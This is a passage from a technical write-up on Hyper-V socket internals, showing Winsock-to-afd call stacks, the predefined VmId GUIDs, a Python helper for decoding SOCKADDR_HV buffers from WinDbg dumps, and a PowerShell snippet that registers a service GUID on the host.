<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL – 1201F)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!WSPSend</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">02 WS2_32!send</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdFastIoDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12017)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!WSPRecv</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">02 WS2_32!recv</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdFastIoDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12017)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!WSPRecv</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">02 WS2_32!recv</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 ClientExample!Client::Recv</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 ClientExample!main</span></div>
</td></tr>
</tbody></table>
</div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Where the same Winsock call takes a different path on the server and on the client side, I note it in the text. Some details of the client part are covered later, in the PowerShell Direct analysis.</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Hyper-V sockets do not use IP addresses: a partition is addressed by its VmId GUID and a service by a service GUID. Several VmIds are predefined:</span></div>
<div dir="ltr" style="margin-left: -5.4pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="208"></col><col width="208"></col><col width="208"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: bottom;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Name</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: bottom;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">GUID</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: bottom;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Description</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_ZERO, HV_GUID_WILDCARD</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000-0000-0000-0000-000000000000</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Listeners should bind to this VmId to accept connection from all partitions.</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_BROADCAST</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_CHILDREN</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">90db8b89-0d35-4f79-8ce9-49ea0ac8b7cd</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wildcard address for children. Listeners should bind to this VmId to accept connection from its children.</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_LOOPBACK</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">e0e16197-dd56-4a10-9195-5ee7a155a838</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Loopback address. Using this VmId connects to the same partition as the connector.</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_PARENT</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">a42e7cda-d03f-480c-9cc2-a4de20abb878</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Parent address. Using this VmId connects to the parent partition of the connector.*</span></div>
</td></tr>
</tbody></table>
</div>
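<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">These GUIDs are what you see in the input buffer of the bind and connect IOCTLs when tracing NtDeviceIoControlFile into afd. The Python helper below is an added example, not the author's code and not part of any Microsoft SDK: it encodes and decodes the 36-byte SOCKADDR_HV structure (USHORT Family = AF_HYPERV, USHORT Reserved, GUID VmId, GUID ServiceId, as declared in hvsocket.h), names the predefined VmIds from the table above, and rebuilds such a buffer from WinDbg db output. The db dump and the service GUID 12345678-9abc-4def-8123-456789abcdef are constructed for the example. The Windows GUID byte order (Data1..Data3 little-endian, Data4 raw) is why the dump does not read like the GUID string, and is the part that is easy to get wrong when decoding by hand.</span></div>

```python
import re
import struct
import uuid

AF_HYPERV = 34           # ws2def.h
SOCKADDR_HV_SIZE = 36    # USHORT Family + USHORT Reserved + GUID VmId + GUID ServiceId

# Predefined VmIds from the table above (HV_GUID_BROADCAST included).
WELL_KNOWN_VMIDS = {
    uuid.UUID("00000000-0000-0000-0000-000000000000"): "HV_GUID_ZERO/HV_GUID_WILDCARD",
    uuid.UUID("ffffffff-ffff-ffff-ffff-ffffffffffff"): "HV_GUID_BROADCAST",
    uuid.UUID("90db8b89-0d35-4f79-8ce9-49ea0ac8b7cd"): "HV_GUID_CHILDREN",
    uuid.UUID("e0e16197-dd56-4a10-9195-5ee7a155a838"): "HV_GUID_LOOPBACK",
    uuid.UUID("a42e7cda-d03f-480c-9cc2-a4de20abb878"): "HV_GUID_PARENT",
}


def encode_sockaddr_hv(vm_id: str, service_id: str) -> bytes:
    """Build the SOCKADDR_HV that WS2_32!connect/bind hand down to afd.
    A Windows GUID is Data1/Data2/Data3 little-endian plus 8 raw bytes,
    which is exactly what uuid.UUID.bytes_le produces."""
    return (struct.pack("<HH", AF_HYPERV, 0)
            + uuid.UUID(vm_id).bytes_le
            + uuid.UUID(service_id).bytes_le)


def decode_sockaddr_hv(buf: bytes) -> dict:
    """Decode a SOCKADDR_HV taken from an IOCTL input buffer.
    Anything whose Family is not AF_HYPERV is rejected instead of being
    misread as a Hyper-V address."""
    if len(buf) < SOCKADDR_HV_SIZE:
        raise ValueError(f"need {SOCKADDR_HV_SIZE} bytes, got {len(buf)}")
    family, reserved = struct.unpack_from("<HH", buf, 0)
    if family != AF_HYPERV:
        raise ValueError(f"address family {family} is not AF_HYPERV ({AF_HYPERV})")
    vm_id = uuid.UUID(bytes_le=bytes(buf[4:20]))
    service_id = uuid.UUID(bytes_le=bytes(buf[20:36]))
    return {
        "family": family,
        "reserved": reserved,
        "vm_id": str(vm_id),
        "vm_id_name": WELL_KNOWN_VMIDS.get(vm_id, "<specific partition VmId>"),
        "service_id": str(service_id),
    }


# One WinDbg `db` line: address, then bytes separated by ' ' or '-', then two spaces and ASCII.
_DB_LINE = re.compile(r"^\s*[0-9a-fA-F`]+\s+((?:[0-9a-fA-F]{2}[ -])*[0-9a-fA-F]{2})")


def parse_db_dump(text: str) -> bytes:
    """Turn pasted WinDbg `db` output back into the raw bytes it displayed."""
    out = bytearray()
    for line in text.splitlines():
        m = _DB_LINE.match(line)
        if m:
            out += bytes.fromhex(re.sub(r"[ -]", "", m.group(1)))
    return bytes(out)


# Constructed sample, not a real capture: what `db` would show for a SOCKADDR_HV
# passed to connect() with VmId = HV_GUID_PARENT and the hypothetical service GUID
# 12345678-9abc-4def-8123-456789abcdef. Note Data1 of the parent GUID (a42e7cda)
# appears as "da 7c 2e a4".
SAMPLE_DB_DUMP = """
0000002b`1a2ff5c0  22 00 00 00 da 7c 2e a4-3f d0 0c 48 9c c2 a4 de  "....|..?..H....
0000002b`1a2ff5d0  20 ab b8 78 78 56 34 12-bc 9a ef 4d 81 23 45 67   ..xxV4....M.#Eg
0000002b`1a2ff5e0  89 ab cd ef                                      ....
"""


def decode_db_dump(text: str) -> dict:
    """Convenience: db output in, decoded SOCKADDR_HV out."""
    return decode_sockaddr_hv(parse_db_dump(text))


if __name__ == "__main__":
    for key, value in decode_db_dump(SAMPLE_DB_DUMP).items():
        print(f"{key:12} {value}")
```

<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">On a live target, break on the IOCTL in the stacks above, dump 36 bytes at the address passed in the input buffer with db, and paste the output into decode_db_dump. A decoded VmId that is not one of the predefined values is the ID of a concrete partition, which you can match against Get-VM output on the host.</span></div>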
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In our case we will use HV_GUID_PARENT. The second GUID we need identifies the service; it is generated with the PowerShell script below, which also registers it on the host so that a guest is allowed to connect to it:</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: orangered; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$friendlyName</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkgrey; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkred; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"HV Socket Application"</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="background-color: white; line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: darkgreen; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Create a new random GUID and add it to the services list then add the name as a value</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="background-color: white; line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: orangered; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$service</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkgrey; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">New-Item</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: navy; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-Path</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkred; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\GuestCommunicationServices"</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: navy; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-Name</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ((</span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">New-Guid</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span><span style="background-color: transparent; color: darkgrey; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Guid)</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="background-color: white; line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: orangered; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$service</span><span style="background-color: transparent; color: darkgrey; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SetValue(</span><span style="background-color: transparent; color: darkred; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"ElementName"</span><span style="background-color: transparent; color: darkgrey; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: orangered; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$friendlyName</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="background-color: white; line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: darkgreen; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Print the GUID so it can be noted for later use</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Write-Host</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkred; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Service GUID: "</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: orangered; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$service</span><span style="background-color: transparent; color: darkgrey; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PSChildName </span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">and note the GUID it prints. Alternatively, one of the GUIDs that Windows already registers during installation in the same registry key can be reused:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: darkred; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\GuestCommunicationServices</span></div>
<br /><div dir="ltr" style="margin-left: 30.6pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="288"></col><col width="287"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">GUID</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Name</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
